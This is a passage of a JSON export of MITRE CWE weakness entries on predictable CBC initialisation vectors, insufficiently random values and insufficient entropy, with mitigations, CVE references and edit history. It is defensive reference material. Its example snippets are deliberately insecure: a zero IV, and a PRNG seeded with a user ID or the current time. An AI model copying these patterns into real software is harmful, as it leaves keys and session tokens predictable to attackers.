is a commonly used mode of operation for a\\n\\t block cipher. It works by XOR-ing an IV with the initial\\n\\t block of a plaintext prior to encryption and then\\n\\t XOR-ing each successive block of plaintext with the\\n\\t previous block of ciphertext before encryption.","When used properly, CBC mode provides security against\\n\\t\\tchosen plaintext attacks. Having an unpredictable IV\\n\\t\\tis a crucial underpinning of this. See [REF-1171]."],"xhtml:div":{"#text":"C_0 = IVC_i = E_k{M_i XOR C_{i-1}}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"Designers might assume a non-cryptographic context for a cryptographic variable."},{"Phase":"Implementation","Note":"Developers might dismiss the importance of an unpredictable IV and choose an easier implementation to save effort, weakening the scheme in the process."}]},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"If the IV is not properly initialized, data that is encrypted can be compromised and leak information."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"NIST recommends two methods of generating unpredictable IVs for CBC mode [REF-1172]. The first is to generate the IV randomly. The second method is to encrypt a nonce with the same key and cipher to be used to encrypt the plaintext. In this case the nonce must be unique but can be predictable, since the block cipher will act as a pseudo random permutation."}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-143"},"Intro_Text":"In the following examples, CBC mode is used when encrypting data:","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"EVP_CIPHER_CTX ctx;char key[EVP_MAX_KEY_LENGTH];char iv[EVP_MAX_IV_LENGTH];RAND_bytes(key, b);memset(iv,0,EVP_MAX_IV_LENGTH);EVP_EncryptInit(&ctx,EVP_bf_cbc(), key,iv);","xhtml:br":["","","","",""]}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public class SymmetricCipherTest {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"public static void main() {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"byte[] text =\\"Secret\\".getBytes();byte[] iv ={};KeyGenerator kg = KeyGenerator.getInstance(\\"DES\\");kg.init(56);SecretKey key = kg.generateKey();Cipher cipher = Cipher.getInstance(\\"DES/CBC/PKCS5Padding\\");IvParameterSpec ips = new IvParameterSpec(iv);cipher.init(Cipher.ENCRYPT_MODE, key, ips);return cipher.doFinal(inpBytes);","xhtml:br":["","","","","","","","",""],"xhtml:div":{"#text":"0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00","attr":{"@_style":"margin-left:10px;"}}}}}}}}],"Body_Text":"In both of these examples, the initialization vector (IV) is always a block of zeros. This makes the resulting cipher text much more predictable and susceptible to a dictionary attack."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2020-5408","Description":"encryption functionality in an authentication framework uses a fixed null IV with CBC mode, allowing attackers to decrypt traffic in applications that use this functionality","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-5408"},{"Reference":"CVE-2017-17704","Description":"messages for a door-unlocking product use a fixed IV in CBC mode, which is the same after each restart","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17704"},{"Reference":"CVE-2017-11133","Description":"application uses AES in CBC mode, but the pseudo-random secret and IV are generated using math.random, which is not cryptographically strong.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11133"},{"Reference":"CVE-2007-3528","Description":"Blowfish-CBC implementation constructs an IV where each byte is calculated modulo 8 instead of modulo 256, resulting in less than 12 bits for the effective IV length, and less than 4096 possible IV values.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3528"},{"Reference":"CVE-2011-3389","Description":"BEAST attack in SSL 3.0 / TLS 1.0. In CBC mode, chained initialization vectors are non-random, allowing decryption of HTTPS traffic using a chosen plaintext attack.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3389"}]},"Functional_Areas":{"Functional_Area":"Cryptography"},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Not using a random IV with CBC mode"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 2, "Initialization Vectors", Page 42"}},{"attr":{"@_External_Reference_ID":"REF-18"}},{"attr":{"@_External_Reference_ID":"REF-1171"}},{"attr":{"@_External_Reference_ID":"REF-1172","@_Section":"Appendix C"}}]},"Notes":{"Note":{"#text":"As of CWE 4.5, terminology related to randomness, entropy, and\\n\\t predictability can vary widely. Within the developer and other\\n\\t communities, \\"randomness\\" is used heavily. However, within\\n\\t cryptography, \\"entropy\\" is distinct, typically implied as a\\n\\t measurement. There are no commonly-used definitions, even within\\n\\t standards documents and cryptography papers. Future versions of\\n\\t CWE will attempt to define these terms and, if necessary,\\n\\t distinguish between them in ways that are appropriate for\\n\\t different communities but do not reduce the usability of CWE for\\n\\t mapping, understanding, or other scenarios.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Background_Details, Common_Consequences, Functional_Areas, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Background_Details, Common_Consequences, Demonstrative_Examples, Description, Modes_of_Introduction, Name, Observed_Examples, Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Description, Maintenance_Notes, Name, References"}],"Previous_Entry_Name":[{"#text":"Not Using a Random IV with CBC Mode","attr":{"@_Date":"2021-03-15"}},{"#text":"Not Using an Unpredictable IV with CBC Mode","attr":{"@_Date":"2021-07-20"}}]}},"330":{"attr":{"@_ID":"330","@_Name":"Use of Insufficiently Random Values","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Stable"},"Description":"The software uses insufficiently random numbers or values in a security context that depends on unpredictable numbers.","Extended_Description":"When software generates predictable values in a context requiring unpredictability, it may be possible for an attacker to guess the next value that will be generated, and use this guess to impersonate another user or access sensitive information.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"693","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Background_Details":{"Background_Detail":"Computers are deterministic machines, and as such are unable to produce true randomness. Pseudo-Random Number Generators (PRNGs) approximate randomness algorithmically, starting with a seed from which subsequent values are calculated. There are two types of PRNGs: statistical and cryptographic. Statistical PRNGs provide useful statistical properties, but their output is highly predictable and forms an easy to reproduce numeric stream that is unsuitable for use in cases where security depends on generated values being unpredictable. Cryptographic PRNGs address this problem by generating output that is more difficult to predict. For a value to be cryptographically secure, it must be impossible or highly improbable for an attacker to distinguish between it and a truly random value."},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":["Confidentiality","Other"],"Impact":"Other","Note":"When a protection mechanism relies on random values to restrict access to a sensitive resource, such as a session ID or a seed for generating a cryptographic key, then the resource being protected could be accessed by guessing the ID or key."},{"Scope":["Access Control","Other"],"Impact":["Bypass Protection Mechanism","Other"],"Note":"If software relies on unique, unguessable IDs to identify a resource, an attacker might be able to guess an ID for a resource that is owned by another user. The attacker could then read the resource, or pre-create a resource with the same ID to prevent the legitimate program from properly sending the resource to the intended user. For example, a product might maintain session information in a file whose name is based on a username. An attacker could pre-create this file for a victim user, then set the permissions so that the application cannot generate the session for the victim, preventing the victim from using the application."},{"Scope":"Access Control","Impact":["Bypass Protection Mechanism","Gain Privileges or Assume Identity"],"Note":"When an authorization or authentication mechanism relies on random values to restrict access to restricted functionality, such as a session ID or a seed for generating a cryptographic key, then an attacker may access the restricted functionality by guessing the ID or key."}]},"Detection_Methods":{"Detection_Method":[{"attr":{"@_Detection_Method_ID":"DM-11.4"},"Method":"Black Box","Description":{"xhtml:p":["Use monitoring tools that examine the software\'s process as it interacts with the operating system and the network. This technique is useful in cases when source code is unavailable, if the software was not developed by you, or if you want to verify that the build phase did not introduce any new weaknesses. Examples include debuggers that directly attach to the running process; system-call tracing utilities such as truss (Solaris) and strace (Linux); system activity monitors such as FileMon, RegMon, Process Monitor, and other Sysinternals utilities (Windows); and sniffers and protocol analyzers that monitor network traffic.","Attach the monitor to the process and look for library functions that indicate when randomness is being used. Run the process multiple times to see if the seed changes. Look for accesses of devices or equivalent resources that are commonly used for strong (or weak) randomness, such as /dev/urandom on Linux. Look for library or system calls that access predictable information such as process IDs and system time."]}},{"Method":"Automated Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Bytecode Weakness Analysis - including disassembler + source code weakness analysis","Binary Weakness Analysis - including disassembler + source code weakness analysis"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Man-in-the-middle attack tool"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Focused Manual Spotcheck - Focused manual analysis of source","Manual Source Code Review (not inspections)"]}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Source code Weakness Analyzer","Context-configured Source Code Weakness Analyzer"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)"}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":{"xhtml:p":["Use a well-vetted algorithm that is currently considered to be strong by experts in the field, and select well-tested implementations with adequate length seeds.","In general, if a pseudo-random number generator is not advertised as being cryptographically secure, then it is probably a statistical PRNG and should not be used in security-sensitive contexts.","Pseudo-random number generators can produce predictable numbers if the generator is known and the seed can be guessed. A 256-bit seed is a good starting point for producing a \\"random enough\\" number."]}},{"Phase":"Implementation","Description":"Consider a PRNG that re-seeds itself as needed from high quality pseudo-random output sources, such as hardware devices."},{"Phase":"Testing","Description":"Use automated static analysis tools that target this type of weakness. Many modern techniques use data flow analysis to minimize the number of false positives. This is not a perfect solution, since 100% accuracy and coverage are not feasible."},{"attr":{"@_Mitigation_ID":"MIT-2"},"Phase":["Architecture and Design","Requirements"],"Strategy":"Libraries or Frameworks","Description":"Use products or modules that conform to FIPS 140-2 [REF-267] to avoid obvious entropy problems. Consult FIPS 140-2 Annex C (\\"Approved Random Number Generators\\")."},{"Phase":"Testing","Description":"Use tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session. These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-45"},"Intro_Text":"This code attempts to generate a unique random identifier for a user\'s session.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"function generateSessionID($userID){}","xhtml:div":{"#text":"srand($userID);return rand();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}},"Body_Text":["Because the seed for the PRNG is always the user\'s ID, the session ID will always be the same. An attacker could thus predict any user\'s session ID and potentially hijack the session.","This example also exhibits a Small Seed Space (CWE-339)."]},{"attr":{"@_Demonstrative_Example_ID":"DX-46"},"Intro_Text":"The following code uses a statistical PRNG to create a URL for a receipt that remains active for some period of time after a purchase.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String GenerateReceiptURL(String baseUrl) {}","xhtml:div":{"#text":"Random ranGen = new Random();ranGen.setSeed((new Date()).getTime());return(baseUrl + ranGen.nextInt(400000000) + \\".html\\");","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}}},"Body_Text":"This code uses the Random.nextInt() function to generate \\"unique\\" identifiers for the receipt pages it generates. Because Random.nextInt() is a statistical PRNG, it is easy for an attacker to guess the strings it generates. Although the underlying design of the receipt system is also faulty, it would be more secure if it used a random number generator that did not produce predictable receipt identifiers, such as a cryptographic PRNG."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2009-3278","Description":"Crypto product uses rand() library function to generate a recovery key, making it easier to conduct brute force attacks.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3278"},{"Reference":"CVE-2009-3238","Description":"Random number generator can repeatedly generate the same value.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3238"},{"Reference":"CVE-2009-2367","Description":"Web application generates predictable session IDs, allowing session hijacking.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2367"},{"Reference":"CVE-2009-2158","Description":"Password recovery utility generates a relatively small number of random passwords, simplifying brute force attacks.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2158"},{"Reference":"CVE-2009-0255","Description":"Cryptographic key created with a seed based on the system time.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0255"},{"Reference":"CVE-2008-5162","Description":"Kernel function does not have a good entropy source just after boot.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5162"},{"Reference":"CVE-2008-4905","Description":"Blogging software uses a hard-coded salt when calculating a password hash.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4905"},{"Reference":"CVE-2008-4929","Description":"Bulletin board application uses insufficiently random names for uploaded files, allowing other users to access private files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4929"},{"Reference":"CVE-2008-3612","Description":"Handheld device uses predictable TCP sequence numbers, allowing spoofing or hijacking of TCP connections.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3612"},{"Reference":"CVE-2008-2433","Description":"Web management console generates session IDs based on the login time, making it easier to conduct session hijacking.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2433"},{"Reference":"CVE-2008-0166","Description":"SSL library uses a weak random number generator that only generates 65,536 unique keys.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0166"},{"Reference":"CVE-2008-2108","Description":"Chain: insufficient precision causes extra zero bits to be assigned, reducing entropy for an API function that generates random numbers.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2108"},{"Reference":"CVE-2008-2108","Description":"Chain: insufficient precision (CWE-1339) in\\n\\t random-number generator causes some zero bits to be reliably\\n\\t generated, reducing the amount of entropy (CWE-331)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2108"},{"Reference":"CVE-2008-2020","Description":"CAPTCHA implementation does not produce enough different images, allowing bypass using a database of all possible checksums.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2020"},{"Reference":"CVE-2008-0087","Description":"DNS client uses predictable DNS transaction IDs, allowing DNS spoofing.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0087"},{"Reference":"CVE-2008-0141","Description":"Application generates passwords that are based on the time of day.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0141"}]},"Functional_Areas":{"Functional_Area":["Cryptography","Authentication","Session Management"]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Randomness and Predictability"},{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Insecure Randomness"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A2","Entry_Name":"Broken Access Control","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"CON33-C","Entry_Name":"Avoid race conditions when using library functions","Mapping_Fit":"Imprecise"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MSC30-C","Entry_Name":"Do not use the rand() function for generating pseudorandom numbers","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MSC32-C","Entry_Name":"Properly seed pseudorandom number generators","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":11,"Entry_Name":"Brute Force"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":18,"Entry_Name":"Credential/Session Prediction"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"MSC02-J","Entry_Name":"Generate strong random numbers"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"112"}},{"attr":{"@_CAPEC_ID":"485"}},{"attr":{"@_CAPEC_ID":"59"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-267"}},{"attr":{"@_External_Reference_ID":"REF-207"}},{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 8, "Using Poor Random Numbers" Page 259"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":""Sin 20: Weak Random Numbers." Page 299"}}]},"Notes":{"Note":[{"#text":"This can be primary to many other weaknesses such as cryptographic errors, authentication errors, symlink following, information leaks, and others.","attr":{"@_Type":"Relationship"}},{"#text":"As of CWE 4.3, CWE-330 and its descendants are being\\n\\t\\t\\t investigated by the CWE crypto team to identify gaps\\n\\t\\t\\t related to randomness and unpredictability, as well as\\n\\t\\t\\t the relationships between randomness and cryptographic\\n\\t\\t\\t primitives. This \\"subtree analysis\\" might\\n\\t\\t\\t result in the addition or deprecation of existing\\n\\t\\t\\t entries; the reorganization of relationships in some\\n\\t\\t\\t views, e.g. the research view (CWE-1000); more consistent\\n\\t\\t\\t use of terminology; and/or significant modifications to\\n\\t\\t\\t related entries.","attr":{"@_Type":"Maintenance"}},{"#text":"As of CWE 4.5, terminology related to randomness, entropy, and\\n\\t predictability can vary widely. Within the developer and other\\n\\t communities, \\"randomness\\" is used heavily. However, within\\n\\t cryptography, \\"entropy\\" is distinct, typically implied as a\\n\\t measurement. There are no commonly-used definitions, even within\\n\\t standards documents and cryptography papers. Future versions of\\n\\t CWE will attempt to define these terms and, if necessary,\\n\\t distinguish between them in ways that are appropriate for\\n\\t different communities but do not reduce the usability of CWE for\\n\\t mapping, understanding, or other scenarios.","attr":{"@_Type":"Maintenance"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Background_Details, Relationships, Other_Notes, Relationship_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Description, Likelihood_of_Exploit, Other_Notes, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Description, Observed_Examples, Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Detection_Factors, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Potential_Mitigations, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Observed_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Functional_Areas, Likelihood_of_Exploit, Modes_of_Introduction, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Maintenance_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Demonstrative_Examples, Maintenance_Notes, Observed_Examples"}],"Previous_Entry_Name":{"#text":"Randomness and Predictability","attr":{"@_Date":"2008-04-11"}}}},"331":{"attr":{"@_ID":"331","@_Name":"Insufficient Entropy","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software uses an algorithm or scheme that produces insufficient entropy, leaving patterns or clusters of values that are more likely to occur than others.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"330","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"330","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Common_Consequences":{"Consequence":{"Scope":["Access Control","Other"],"Impact":["Bypass Protection Mechanism","Other"],"Note":"An attacker could guess the random numbers generated and could gain unauthorized access to a system if the random numbers are used for authentication and authorization."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Determine the necessary entropy to adequately provide for randomness and predictability. This can be achieved by increasing the number of bits of objects such as keys and seeds."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-45"},"Intro_Text":"This code generates a unique random identifier for a user\'s session.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"function generateSessionID($userID){}","xhtml:div":{"#text":"srand($userID);return rand();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}},"Body_Text":["Because the seed for the PRNG is always the user\'s ID, the session ID will always be the same. An attacker could thus predict any user\'s session ID and potentially hijack the session.","This example also exhibits a Small Seed Space (CWE-339)."]},{"attr":{"@_Demonstrative_Example_ID":"DX-46"},"Intro_Text":"The following code uses a statistical PRNG to create a URL for a receipt that remains active for some period of time after a purchase.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String GenerateReceiptURL(String baseUrl) {}","xhtml:div":{"#text":"Random ranGen = new Random();ranGen.setSeed((new Date()).getTime());return(baseUrl + ranGen.nextInt(400000000) + \\".html\\");","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}}},"Body_Text":"This code uses the Random.nextInt() function to generate \\"unique\\" identifiers for the receipt pages it generates. Because Random.nextInt() is a statistical PRNG, it is easy for an attacker to guess the strings it generates. Although the underlying design of the receipt system is also faulty, it would be more secure if it used a random number generator that did not produce predictable receipt identifiers, such as a cryptographic PRNG."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2001-0950","Description":"Insufficiently random data used to generate session tokens using C rand(). Also, for certificate/key generation, uses a source that does not block when entropy is low.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0950"},{"Reference":"CVE-2008-2108","Description":"Chain: insufficient precision (CWE-1339) in\\n\\t random-number generator causes some zero bits to be reliably\\n\\t generated, reducing the amount of entropy (CWE-331)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2108"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Insufficient Entropy"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":11,"Entry_Name":"Brute Force"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MSC32-C","Entry_Name":"Properly seed pseudorandom number generators","Mapping_Fit":"Exact"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"59"}}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-207"}}},"Notes":{"Note":{"#text":"As of CWE 4.5, terminology related to randomness, entropy, and\\n\\t predictability can vary widely. Within the developer and other\\n\\t communities, 